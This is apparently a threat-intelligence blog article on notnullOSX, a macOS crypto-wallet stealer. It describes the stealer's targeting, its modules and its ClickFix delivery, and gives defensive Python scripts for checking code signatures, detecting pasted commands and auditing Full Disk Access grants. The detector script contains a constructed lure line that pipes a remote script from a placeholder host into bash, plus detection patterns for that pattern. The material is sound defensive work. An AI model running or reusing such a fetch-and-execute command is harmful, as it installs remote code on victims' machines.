notnullOSX Malware: High-Value Crypto Wallets at Risk

The cryptocurrency landscape has long been a digital Wild West, but as we move deeper into 2026, the outlaws are becoming significantly more sophisticated. The era of “spray and pray” malware, where threat actors cast wide nets hoping to catch any available data, is being eclipsed by surgical, high-yield operations. At the forefront of this evolution is notnullOSX malware, a specialized information stealer written in Go that represents a paradigm shift in how macOS systems are compromised. Unlike its predecessors, which sought to infect as many machines as possible, notnullOSX is governed by a strict “quality over quantity” ethos, specifically engineered to hunt individuals with cryptocurrency holdings exceeding $10,000.
The Genesis of notnullOSX: The Return of alh1mik
The emergence of the notnullOSX malware is not merely a technical event; it is the culmination of a long-standing narrative within the cybercrime underground. The developer behind the threat, known as alh1mik, was previously a prominent figure under the alias 0xFFF. In 2023, 0xFFF famously vanished from high-profile hacking forums following a public dispute and a fabricated law enforcement tip that led to a “rage-quit” of the community.
By August 2024, the actor re-emerged under the moniker alh1mik, offering an apology to the forum administrators and a promise: the development of a premier, modular macOS stealer that would surpass the capabilities of the then-dominant Atomic macOS Stealer (AMOS). After nearly two years of refined development and paying close attention to the evolving macOS security landscape, alh1mik delivered notnullOSX in early 2026. Initially detected by researchers at Moonlock Lab on March 30, 2026, the malware quickly established a footprint in Vietnam, Taiwan, and Spain, signaling a targeted rollout of what is now considered one of the most dangerous threats to the macOS ecosystem.
Surgical Precision: The $10,000 Threshold
What distinguishes notnullOSX malware from standard infostealers is its administrative gatekeeping. The malware is distributed through an affiliate panel where operators must manually pre-screen their targets. Before an infection chain is even initiated, operators are required to submit a dossier on the potential victim, including:
- Verified cryptocurrency wallet balances.
- Social media profiles (LinkedIn, X, Telegram).
- Correspondence history or professional background.
- Geographic location.
The affiliate system automatically rejects any target whose verifiable assets fall below the $10,000 USD threshold. This strategic decision reduces the noise generated by the malware, making it less likely to be flagged by broad-spectrum security telemetry and ensuring that every successful infection yields a high return on investment (ROI). For the threat actor, it is a matter of resource management; for the victim, it is a terrifying realization that they were specifically selected for their wealth.
Technical Anatomy: A Modular Go-Based Powerhouse
The notnullOSX malware is written in Golang (Go), a choice that provides several advantages to the developer. Go’s ability to compile into a single, static binary makes it difficult for traditional antivirus solutions to perform signature-based detection, as the resulting code is often bulky and structurally unique compared to C++ or Python-based threats.
Modular Architecture and Command-and-Control (C2)
The malware operates through a highly modular framework. Upon initial execution, the core “dropper” establishes a persistent connection with its C2 server. Instead of carrying all its malicious payloads at once—which would increase the risk of detection—notnullOSX downloads specific modules based on the environment it finds itself in. Confirmed modules include:
- iMessageGrab: Scans and exfiltrates the chat.db database, allowing attackers to search for private keys or recovery phrases shared in messages.
- AppleNotesGrab: Extracts data from the macOS Notes app, a common repository for users to store passwords or seed phrases.
- BrowserGrab: Targets Safari, Chrome, and Firefox to harvest cookies, saved credentials, and autofill data.
- CryptoWalletsGrab: Specifically targets local files for Bitcoin Core, Exodus, Electrum, and MetaMask.
The ReplaceApp Module: The Ultimate Hardware Wallet Threat
Perhaps the most sophisticated component of the notnullOSX malware is the ReplaceApp module. This feature is designed to circumvent the security of hardware wallets like Ledger and Trezor. Because the private keys of a hardware wallet never leave the device, they are theoretically immune to traditional software stealers.
The ReplaceApp module bypasses this by silently swapping the legitimate Ledger Live or Trezor Suite applications with trojanized versions. When a user opens what they believe to be their official wallet software, they are presented with a perfectly replicated interface. If the user attempts to “restore” their wallet or perform an update, the fake app prompts them to enter their 24-word seed phrase. Once entered, the phrase is exfiltrated in real-time, giving the attacker full control over the funds stored on the physical device.
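The defence against a swapped wallet app is to check that the bundle on disk still carries the vendor's own code signature before trusting anything it displays. The script below is an added example for this article, not code from the researchers, Ledger or Trezor. It parses the key=value text that `codesign -dv --verbose=4` writes and compares the signing Team ID against one you recorded from a known-good install; the EXPECTED_TEAM_IDS values are placeholders you must replace, and the two sample outputs are constructed, not real vendor data.

```python
"""Verify that a hardware-wallet companion app still carries its vendor's signature.

Added example for this article; not code from the researchers, Ledger or Trezor.
Assumptions, labelled: the EXPECTED_TEAM_IDS values are placeholders that you
replace with the Team ID you read from a known-good install, and the parsing
targets the key=value text that `codesign -dv --verbose=4` writes to stderr.
"""
import re
import subprocess
from typing import Any, Dict

# Placeholder allowlist: bundle path -> Apple Developer Team ID you verified yourself.
EXPECTED_TEAM_IDS = {
    "/Applications/Ledger Live.app": "PLACEHOLDER_LEDGER_TEAM_ID",
    "/Applications/Trezor Suite.app": "PLACEHOLDER_TREZOR_TEAM_ID",
}

# Constructed codesign-style output for a Developer ID signed app (not real vendor data).
GOOD_OUTPUT = """Executable=/Applications/Example Wallet.app/Contents/MacOS/Example Wallet
Identifier=com.example.wallet
Format=app bundle with Mach-O universal (x86_64 arm64)
CodeDirectory v=20500 size=1234 flags=0x10000(runtime) hashes=30+7 location=embedded
Authority=Developer ID Application: Example Vendor (ABCDE12345)
Authority=Developer ID Certification Authority
Authority=Apple Root CA
TeamIdentifier=ABCDE12345
"""

# Constructed output for an ad-hoc signed replacement: no certificate chain, no team.
ADHOC_OUTPUT = """Executable=/Applications/Example Wallet.app/Contents/MacOS/Example Wallet
Identifier=com.example.wallet
Format=app bundle with Mach-O thin (arm64)
Signature=adhoc
TeamIdentifier=not set
"""

_KV = re.compile(r"^([A-Za-z]+)=(.*)$")


def parse_codesign(output: str) -> Dict[str, Any]:
    """Turn codesign's key=value lines into a dict; repeated Authority= lines become a list."""
    info: Dict[str, Any] = {"Authority": []}
    for line in output.splitlines():
        m = _KV.match(line.strip())
        if not m:
            continue
        key, value = m.groups()
        if key == "Authority":
            info["Authority"].append(value)
        else:
            info[key] = value
    return info


def assess(codesign_output: str, expected_team: str) -> str:
    """Classify parsed signing info: ok, team-mismatch, not-developer-id or unsigned-or-adhoc."""
    info = parse_codesign(codesign_output)
    team = info.get("TeamIdentifier", "not set")
    authorities = info["Authority"]
    if not authorities or team == "not set":
        return "unsigned-or-adhoc"      # a swapped bundle usually lands here
    if not any(a.startswith("Developer ID Application:") for a in authorities):
        return "not-developer-id"       # signed, but not with a Developer ID certificate
    if team != expected_team:
        return "team-mismatch"          # signed by someone other than the vendor you recorded
    return "ok"


def check_bundle(path: str, expected_team: str) -> str:
    """Run the real codesign tool (macOS only): strict deep verification, then identity check."""
    verify = subprocess.run(["codesign", "--verify", "--deep", "--strict", path],
                            capture_output=True, text=True)
    if verify.returncode != 0:
        return "verification-failed"    # bundle contents no longer match what was signed
    detail = subprocess.run(["codesign", "-dv", "--verbose=4", path],
                            capture_output=True, text=True)
    return assess(detail.stderr, expected_team)


if __name__ == "__main__":
    for app, team in EXPECTED_TEAM_IDS.items():
        print(f"{app}: {check_bundle(app, team)}")
```

Run it after any wallet update and before entering a seed phrase anywhere; a result other than `ok` means the app on disk is not the one the vendor signed, which is precisely the condition ReplaceApp creates.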
Multi-Layered Social Engineering: The “ClickFix” Trap
The delivery of notnullOSX malware relies on psychological manipulation rather than zero-day vulnerabilities. The primary infection vector is a sophisticated “ClickFix” campaign that exploits the trust users place in familiar platforms like Google and YouTube.
The Fake “Google API Connector”
Victims often receive a link to a “protected” Google Document. When the page loads, it displays a convincing error message stating that the document cannot be decrypted because the “Google API Connector” is out of date. To “fix” the error, the user is presented with two options:
- The Terminal Path: The user is instructed to copy a Base64-encoded command and paste it into their macOS Terminal. This command uses osascript to download and execute a remote bash script that installs the malware.
- The DMG Path: The user downloads a disk image file (DMG) that appears to be a legitimate installer but actually contains the modular stealer.
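The Terminal path leaves a trace that is easy to check for: the pasted line is usually `echo <blob> | base64 -d | bash` or similar, and the blob decodes to an osascript launcher. The detector below is an added example for this article, not code from Moonlock Lab or the actor. It scans shell-history or clipboard lines, decodes any Base64-looking token, and reports the behaviours the article describes whether they appear in the raw line or only inside the decoded text. The SAMPLE_HISTORY lines are constructed, and the domain in the lure sample is a reserved `.invalid` name.

```python
"""Flag pasted "fix" commands that hide a downloader behind Base64.

Added example for this article, not code from Moonlock Lab or the actor. It takes
shell-history or clipboard lines, decodes any Base64-looking token, and reports the
behaviours the article describes (osascript launching a shell, a remote script piped
into bash) whether they appear in the raw line or only inside the decoded blob.
The SAMPLE_HISTORY lines are constructed; the domain is a reserved .invalid name.
"""
import base64
import binascii
import re
from typing import List, Tuple

# A run of >= 24 Base64 characters, optionally padded, not glued to other Base64 text.
_B64_TOKEN = re.compile(r"(?<![A-Za-z0-9+/=])[A-Za-z0-9+/]{24,}={0,2}(?![A-Za-z0-9+/=])")

INDICATORS = [
    ("osascript", re.compile(r"\bosascript\b")),
    ("do-shell-script", re.compile(r"do shell script", re.IGNORECASE)),
    ("remote-script-to-shell", re.compile(r"\bcurl\b[^|\n]*\|\s*(ba)?sh\b")),
    ("base64-decode-exec", re.compile(r"base64\s+(-d|-D|--decode)\b[^|\n]*\|\s*(ba)?sh\b")),
]


def decode_blobs(text: str) -> List[str]:
    """Return the printable UTF-8 decoding of every Base64-looking token in text."""
    decoded_texts = []
    for m in _B64_TOKEN.finditer(text):
        core = m.group(0).rstrip("=")
        padded = core + "=" * (-len(core) % 4)
        try:
            raw = base64.b64decode(padded, validate=True)
            decoded = raw.decode("utf-8")
        except (binascii.Error, ValueError, UnicodeDecodeError):
            continue  # hashes, random IDs and binary blobs end up here
        if all(ch.isprintable() or ch in "\r\n\t" for ch in decoded):
            decoded_texts.append(decoded)
    return decoded_texts


def analyse_command(line: str) -> Tuple[int, List[str]]:
    """Score one command line; returns (score, indicator names that fired)."""
    blobs = decode_blobs(line)
    hits = [name for name, pat in INDICATORS if any(pat.search(t) for t in [line] + blobs)]
    if blobs:
        hits.append("base64-payload")  # an encoded command is itself worth noting
    return len(hits), hits


def triage(lines: List[str], threshold: int = 2) -> List[Tuple[str, int, List[str]]]:
    """Return (line, score, hits) for every line at or above the threshold."""
    flagged = []
    for line in lines:
        score, hits = analyse_command(line)
        if score >= threshold:
            flagged.append((line, score, hits))
    return flagged


# Constructed sample history: two ordinary lines and one in the shape the lure produces.
_BENIGN_NOTE = base64.b64encode(b"hello world, this is a benign note").decode()
_LURE_BLOB = base64.b64encode(
    b"osascript -e 'do shell script \"curl -fsSL https://example.invalid/fix.sh | bash\"'"
).decode()
SAMPLE_HISTORY = [
    "git log --oneline -5",
    f"echo {_BENIGN_NOTE} | base64 -d",
    f"echo {_LURE_BLOB} | base64 -d | bash",
]

if __name__ == "__main__":
    for line, score, hits in triage(SAMPLE_HISTORY):
        print(f"score={score} hits={hits}\n  {line}")
```

A threshold of two keeps a lone `base64 -d` of a harmless note below the line while the lure, which fires on the raw pipe into bash and again on the decoded osascript call, scores well above it; point `triage` at `~/.zsh_history` or at an EDR command-line feed to use it beyond the sample.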
Hijacked YouTube Channels and WallSpace.app
To further bolster the perceived legitimacy of the software, alh1mik’s team utilizes hijacked YouTube channels. In one documented instance, a channel with over 10 years of history and 50,000 subscribers was used to promote a fake live wallpaper application called WallSpace. The high view counts and the age of the channel provide a false sense of security, leading users to download the malicious DMG from the video’s description. Once installed, the malware requests Full Disk Access (FDA) under the guise of needing permission to set the live wallpaper, effectively giving the attacker unrestricted access to the entire file system.
The TCC Bypass: Defeating Apple’s Security Framework
Apple’s macOS relies on the Transparency, Consent, and Control (TCC) framework to protect sensitive user data. Normally, an app attempting to access iMessages or Safari cookies would trigger a system pop-up asking for permission. notnullOSX malware avoids these alerts by tricking the user into granting Full Disk Access during the initial installation process.
By securing FDA, the malware bypasses the TCC gatekeeper entirely. It can then silently read protected directories like ~/Library/Messages and ~/Library/Safari without the user ever seeing another security prompt. This demonstrates a clear understanding of the macOS permission model; the attackers know that if they can convince a user to perform one “trusted” action during setup, they can operate in total silence thereafter.
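Because one Full Disk Access grant is all the malware needs, the useful check is an inventory of who currently holds that grant. The script below is an added example for this article, not Apple's or the researchers' code. Its assumptions are labelled in the comments: the system TCC database path, the `access` table columns it reads, `auth_value` 2 meaning allowed and `client_type` 0 meaning a bundle ID (1 a path); these hold on recent macOS releases but confirm them on yours. Reading the real database needs root or Full Disk Access, so it falls back to a constructed sample when it cannot.

```python
"""Audit which clients hold Full Disk Access so an unexpected grant stands out.

Added example for this article, not Apple's or the researchers' code. Assumptions,
labelled in the comments: the system TCC database path, the `access` table columns
used here, auth_value 2 meaning "allowed" and client_type 0 meaning "bundle ID"
(1 meaning "absolute path"); these hold for recent macOS releases but check them on
yours. Reading the real database itself requires root or Full Disk Access.
"""
import os
import sqlite3
import tempfile
from pathlib import Path
from typing import List, Tuple

TCC_DB = "/Library/Application Support/com.apple.TCC/TCC.db"   # assumed system TCC store
FDA_SERVICE = "kTCCServiceSystemPolicyAllFiles"                # TCC's name for Full Disk Access
AUTH_ALLOWED = 2                                               # assumed: 2 == allowed
CLIENT_TYPE_NAMES = {0: "bundle-id", 1: "path"}                # assumed client_type meanings

# Placeholder allowlist of clients you expect to hold FDA; replace with your own inventory.
EXPECTED_FDA_CLIENTS = {
    "com.example.backup-agent",     # placeholder, not a real product
    "/usr/local/bin/example-edr",   # placeholder
}


def fda_grants(db_path: str) -> List[Tuple[str, str]]:
    """Return (client, client-type name) for every row granted Full Disk Access."""
    uri = Path(db_path).resolve().as_uri() + "?mode=ro"   # read-only: never write TCC.db
    con = sqlite3.connect(uri, uri=True)
    try:
        rows = con.execute(
            "SELECT client, client_type FROM access WHERE service = ? AND auth_value = ?",
            (FDA_SERVICE, AUTH_ALLOWED),
        ).fetchall()
    finally:
        con.close()
    return [(client, CLIENT_TYPE_NAMES.get(ctype, str(ctype))) for client, ctype in rows]


def unexpected_grants(db_path: str, expected=EXPECTED_FDA_CLIENTS) -> List[str]:
    """Clients holding FDA that are not on the allowlist, sorted for stable reporting."""
    return sorted(client for client, _ in fda_grants(db_path) if client not in expected)


def make_sample_db() -> str:
    """Build a constructed TCC-shaped database in a temp file (NOT a real TCC.db); return its path."""
    fd, path = tempfile.mkstemp(suffix=".db")
    os.close(fd)
    con = sqlite3.connect(path)
    con.execute("CREATE TABLE access (service TEXT, client TEXT, client_type INTEGER, auth_value INTEGER)")
    con.executemany("INSERT INTO access VALUES (?, ?, ?, ?)", [
        (FDA_SERVICE, "com.example.backup-agent", 0, 2),        # expected grant
        (FDA_SERVICE, "com.example.wallspace", 0, 2),           # constructed: a "wallpaper" app that asked for FDA
        (FDA_SERVICE, "com.example.denied-app", 0, 0),          # asked, but denied
        ("kTCCServiceAddressBook", "com.example.mail", 0, 2),   # a different TCC service, ignored
    ])
    con.commit()
    con.close()
    return path


if __name__ == "__main__":
    db = TCC_DB if os.access(TCC_DB, os.R_OK) else make_sample_db()
    print(f"auditing {db}")
    for client, kind in fda_grants(db):
        flag = "" if client in EXPECTED_FDA_CLIENTS else "  <-- not on allowlist"
        print(f"{kind:9} {client}{flag}")
```

A wallpaper utility or any other app that has no business reading every file on the system should never appear in this list; when it does, the grant was most likely obtained the way the article describes, and removing it in System Settings is the first containment step.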
Conclusion: A New Era of Digital Extortion
The emergence of notnullOSX malware marks a turning point in the threat landscape for macOS and cryptocurrency users alike. By moving away from broad, automated attacks and toward manual, high-value targeting, the actor alh1mik has created a sustainable and highly profitable model for digital theft. The combination of Go-based modularity, hijacked social proof, and the terrifying ReplaceApp module makes this one of the most effective stealers ever witnessed in the wild.
For high-net-worth individuals and crypto professionals, the lesson is clear: technical security measures like hardware wallets are only as strong as the software used to manage them. Staying safe in the age of notnullOSX requires a rigorous “zero-trust” approach to every Terminal command, every “protected” document, and every third-party application, no matter how legitimate its origin may appear.
Written by
TempMail Ninja
Digital privacy and online security expert. Passionate about creating tools that protect users' identity on the internet.


